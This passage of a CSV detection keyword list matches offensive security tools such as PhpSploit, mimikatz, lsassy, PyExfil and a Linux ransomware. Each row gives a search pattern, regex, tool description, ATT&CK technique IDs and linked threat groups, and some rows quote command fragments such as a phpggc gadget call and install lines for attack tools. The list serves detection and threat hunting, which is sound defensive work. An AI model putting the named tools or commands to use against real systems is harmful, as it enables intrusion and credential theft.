tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54813" "*phpggc monolog/rce1 assert 
'phpinfo()'*",".{0,1000}phpggc\smonolog\/rce1\sassert\s\'phpinfo\(\)\'.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54814" "*phpggc symfony/rce1 id*",".{0,1000}phpggc\ssymfony\/rce1\sid.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54815" "*phpmyadmin_credsteal.*",".{0,1000}phpmyadmin_credsteal\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54816" "*PHPRedirector*AutoOAuthFlow.py*",".{0,1000}PHPRedirector.{0,1000}AutoOAuthFlow\.py.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","54817" "*php-reverse-shell.php*",".{0,1000}php\-reverse\-shell\.php.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54818" "*PhpSploit*",".{0,1000}PhpSploit.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","0","1","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","54819" 
"*phpsploit.txt*",".{0,1000}phpsploit\.txt.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","54820" "*phpsploit_pipe exploit *",".{0,1000}phpsploit_pipe\sexploit\s.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","54821" "*phpsploit_pipe process *",".{0,1000}phpsploit_pipe\sprocess\s.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","54822" "*phpsploit_pipe set BROWSER*",".{0,1000}phpsploit_pipe\sset\sBROWSER.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","54823" "*phpsploit_pipe set PROXY *",".{0,1000}phpsploit_pipe\sset\sPROXY\s.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","54824" "*phpsploit-launcher.sh*",".{0,1000}phpsploit\-launcher\.sh.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","1","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","54825" "*phra/Pezor*",".{0,1000}phra\/Pezor.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54826" "*phra/Pezor/*",".{0,1000}phra\/Pezor\/.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54827" "*PhrozenIO/SharpFtpC2*",".{0,1000}PhrozenIO\/SharpFtpC2.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","1","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","54828" "*PhrozenIO/win-brute-logon*",".{0,1000}PhrozenIO\/win\-brute\-logon.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","1","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","54829" "*phuip-fpizdam*",".{0,1000}phuip\-fpizdam.{0,1000}","offensive_tool_keyword","phuip-fpizdam","This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations. the bug is possible to trigger from the outside. 
This means that a web user may get code execution if you have vulnerable config (see below).","T1190 - T1191 - T1192 - T1210 - T1059","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/neex/phuip-fpizdam","1","1","N/A","N/A","N/A","10","1815","247","2019-11-12T18:53:14Z","2019-09-23T21:37:27Z","54830" "*physmem2profit.exe*",".{0,1000}physmem2profit\.exe.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","1","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","54831" "*Physmem2profit.sln*",".{0,1000}Physmem2profit\.sln.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","54832" "*physmem2profit-public.zip*",".{0,1000}physmem2profit\-public\.zip.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","1","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","54833" "*piata_ssh_userpass.txt*",".{0,1000}piata_ssh_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54834" "*PIC-Exec*runshellcode.asm*",".{0,1000}PIC\-Exec.{0,1000}runshellcode\.asm.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","54835" "*PIC-Exec\addresshunter*",".{0,1000}PIC\-Exec\\addresshunter.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","54836" "*PIC-Get-Privileges*",".{0,1000}PIC\-Get\-Privileges.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 
- T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54837" "*Pickfordmatt/SharpLocker*",".{0,1000}Pickfordmatt\/SharpLocker.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","1","N/A","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","54838" "*PickleC2-main*",".{0,1000}PickleC2\-main.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","54839" "*pico.sh/irc*",".{0,1000}pico\.sh\/irc.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","54840" "*picosh/pico*",".{0,1000}picosh\/pico.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","54841" "*-PID * -Assembly * -Arguments 
*",".{0,1000}\-PID\s.{0,100}\s\-Assembly\s.{0,1000}\s\-Arguments\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","54842" "*pidof gonnacry*",".{0,1000}pidof\sgonnacry.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","N/A","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","54843" "*ping 127.0.0.1 -n 4 > NUL && ""*",".{0,1000}ping\s127\.0\.0\.1\s\-n\s4\s\>\sNUL\s\&\&\s\"".{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","54844" "*ping localhost -n 3 > NUL && del /A H /F *",".{0,1000}ping\slocalhost\s\-n\s3\s\>\sNUL\s\&\&\sdel\s\/A\sH\s\/F\s.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","54845" "*Ping the PtC-RPC server inside LSASS*",".{0,1000}Ping\sthe\sPtC\-RPC\sserver\sinside\sLSASS.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering 
NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","54847" "*pingcastle.com*mysmartlogon.com*",".{0,1000}pingcastle\.com.{0,1000}mysmartlogon\.com.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","54849" "*PingRAT.exe*",".{0,1000}PingRAT\.exe.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0005 - TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","1","N/A","N/A","10","10","416","55","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z","54856" "*ping-sweep*",".{0,1000}ping\-sweep.{0,1000}","offensive_tool_keyword","ping-sweep","Wrapper around the ping utility included 
by the OS. used for recon activities","T1016 - T1046","TA0007","N/A","N/A","Discovery","https://github.com/libresec/ping-sweep","1","0","N/A","N/A","N/A","1","1","0","2016-08-22T15:16:01Z","2016-08-22T02:07:46Z","54857" "*PinoyWH1Z/AoratosWin*",".{0,1000}PinoyWH1Z\/AoratosWin.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","54858" "*pip install coercer*",".{0,1000}pip\sinstall\scoercer.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","54859" "*pip install conpass*",".{0,1000}pip\sinstall\sconpass.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","0","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","54860" "*pip install dnschef*",".{0,1000}pip\sinstall\sdnschef.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","54861" "*pip install donut-shellcode*",".{0,1000}pip\sinstall\sdonut\-shellcode.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54862" "*pip install exegol*",".{0,1000}pip\sinstall\sexegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54863" "*pip install flask flask_cors && ./runserver.sh*",".{0,1000}pip\sinstall\sflask\sflask_cors\s\&\&\s\.\/runserver\.sh.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - 
TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#linux","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","54864" "*pip install gato-x*",".{0,1000}pip\sinstall\sgato\-x.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","54865" "*pip install hiphp*",".{0,1000}pip\sinstall\shiphp.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","54866" "*pip install impacket*",".{0,1000}pip\sinstall\simpacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","54867" "*pip install knowsmore*",".{0,1000}pip\sinstall\sknowsmore.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","54868" "*pip install lsassy*",".{0,1000}pip\sinstall\slsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","54869" "*pip install quiet-riot*",".{0,1000}pip\sinstall\squiet\-riot.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - 
TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","54871" "*pip install rarce*",".{0,1000}pip\sinstall\srarce.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","54872" "*pip install roadlib*",".{0,1000}pip\sinstall\sroadlib.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","54873" "*pip install roadrecon*",".{0,1000}pip\sinstall\sroadrecon.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","54874" "*pip install roadtx*",".{0,1000}pip\sinstall\sroadtx.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network 
exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","54875" "*pip install --user fee",".{0,1000}pip\sinstall\s\-\-user\sfee","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","0","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","54879" "*pip install --user PyExfil*",".{0,1000}pip\sinstall\s\-\-user\sPyExfil.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","54880" "*pip uninstall autorecon*",".{0,1000}pip\suninstall\sautorecon.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 